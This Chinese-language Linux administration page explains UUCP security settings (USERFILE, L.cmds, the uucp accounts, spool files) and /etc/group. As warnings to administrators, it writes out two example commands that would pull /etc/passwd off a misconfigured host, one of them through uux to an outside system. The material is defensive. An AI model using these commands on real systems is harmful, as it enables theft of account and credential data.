|
| |
 精品推荐 |
 |
|
| |
|
|
|
|
linux知识大全
|
日期:2007年10月14日 作者: 查看:[大字体
中字体 小字体]
|
·若两个机器都设置了call_back标志,传送文件的请求决不会被执行,两个系统会一直互相调用,直到两个系统中的一个取消call_back时,才能进行文件传送。
·如果一个用户的登录名列于USERFILE文件的login域中,则当调用本系统的uucico为该用户传送文件时,uucico只传送至path_name指定的目录中的文件。空登录名用于所有未明确列于USERFILE文件中的用户进行登录。所以pat,/usr/pat只允许pat传送/usr/pat目录结构中的文件。/usr/spool/uucppublic/tmp其他用户仅允许传送目录/usr/spool/uucppublic和/tmp中的文件。不要允许uucico将文件拷进/出到除了/usr/spool/uucppublic目录以外的其他任何目录,否则可能会有人用下面的命令拷贝走本系统的重要信息:
uucpyoursys!/etc/passwdto-creep
[目录]
--------------------------------------------------------------------------------
L.cmds文件
uuxqt利用/usr/lib/uucp/L.cmds文件确定要执行的远程执行请求命令。该文件的格式是每行一条命令。如果只需uuxqt处理电子邮件,该文件中就只须一行命令:
rmail
系统管理员可允许登录用户执行netnews(rnews)的命令或远程打印命令(lp),但决不允许用户执行拷贝文件到标准输出的命令,如cat命令或网络命令uucp,否则这些人只需在他们自己的系统上敲入:
uux"yoursys!uucpyoursys!/etc/passwd(outside!~/passwd)"
然后就可等待本系统发送出命令文件。
[目录]
--------------------------------------------------------------------------------
uucp登录
UUCP系统需要两个登录帐户,一个是其他系统登录的帐户,另一个是系统管理使用的帐户。例如,数据传输登录帐户是nuucp,管理登录帐户是uucp,则在/etc/passwd文件中应当有两行。
UID和GID的5号通常留给uucp,由于uucico具有管理登录的SUID许可,因此nuucp帐户的UID和GID应当用其他值。
[目录]
--------------------------------------------------------------------------------
uucp使用的文件和目录
/usr/lib/uucp用于存放不能由用户直接运行的各种uucp,如uuxqt和uucico。该目录还含有若干个确定uucp如何操作的文件,如L.cmds和USERFILE。这些文件只能对uucp管理帐户可写(系统管理员一定不愿让用户更改远程可执行命令表)。根据安全的观点,该目录中另一个系统管理员必须清楚的文件是L.sys。该文件中含有uucico能调用的每个系统的入口项。入口项数据包括uucico所调用系统的电话号码、登录名、未加密的口令。不用说,L.sys应当属于uucp管理帐户所有,且应当具有400或600存取许可。
uucp用/usr/spool/uucp目录存放工作文件。文件名以C.开头的文件是送到其他系统的命令文件,含有在其他系统上拷入(/出)数据和执行命令的请求。文件名以D.开头的文件用作C.文件的数据文件。文件名以X.开头的文件是来自其他系统的远程执行请求,由uuxqt解释。文件名以TM.开始的文件是从其他系统传送数据到本系统过程中uucp所使用的暂存文件。
XQTDIR是uuxqt用于执行X.文件的目录。LOGFILE可有助于管理uucp的安全,它含有执行uucp请求成功与否的信息。系统管理员可时常查看该文件,了解有哪些系统正登录本系统执行uucp请求,是什么请求,特别要检查这些请求是否试图做不允许的操作。
[目录]
--------------------------------------------------------------------------------
/etc/group
/etc/group文件含有关于小组的信息,/etc/passwd中的每个GID在本文件中应当有相应的入口项,入口项中列出了小组名和小组中的用户。这样可方便地了解每个小组的用户,否则必须根据GID在/etc/passwd文件中从头至尾地寻找同组用户。
/etc/group文件对小组的许可权限的控制并不是必要的,因为系统用UID和GID(取自/etc/passwd)决定文件存取权限,即使/etc/group文件不存在于系统中,具有相同的GID用户也可以小组的存取许可权限共享文件。
小组就像登录用户一样可以有口令。如果/etc/group文件入口项的第二个域为非空,则将被认为是加密口令,newgrp命令将要求用户给出口令,然后将口令加密,再与该域的加密口令比较。给小组建立口令一般不是个好方法。第一,如果小组内共享文件,而某人猜中小组口令,则该组的所有用户的文件就可能泄密:其次,管理小组口令很费事,因为对于小组没有类似的passwd命令。可用/usr/lib/makekey生成一个口令写入/etc/group。
以下情况必须建立新组:
·可能要增加新用户,该用户不属于任何一个现有的小组。
·有的用户可能时常需要独自为一个小组。
·有的用户可能有一个SGID程序,需要独自为一个小组。
上一篇:Python入门(一)----什么是python?python及模块的安装
下一篇:安装,配置rp-pppoe拨号软件,使adsl成功上网
|
| 相关文章: |
|
|
|
| 相关软件: |
|
|
|
|
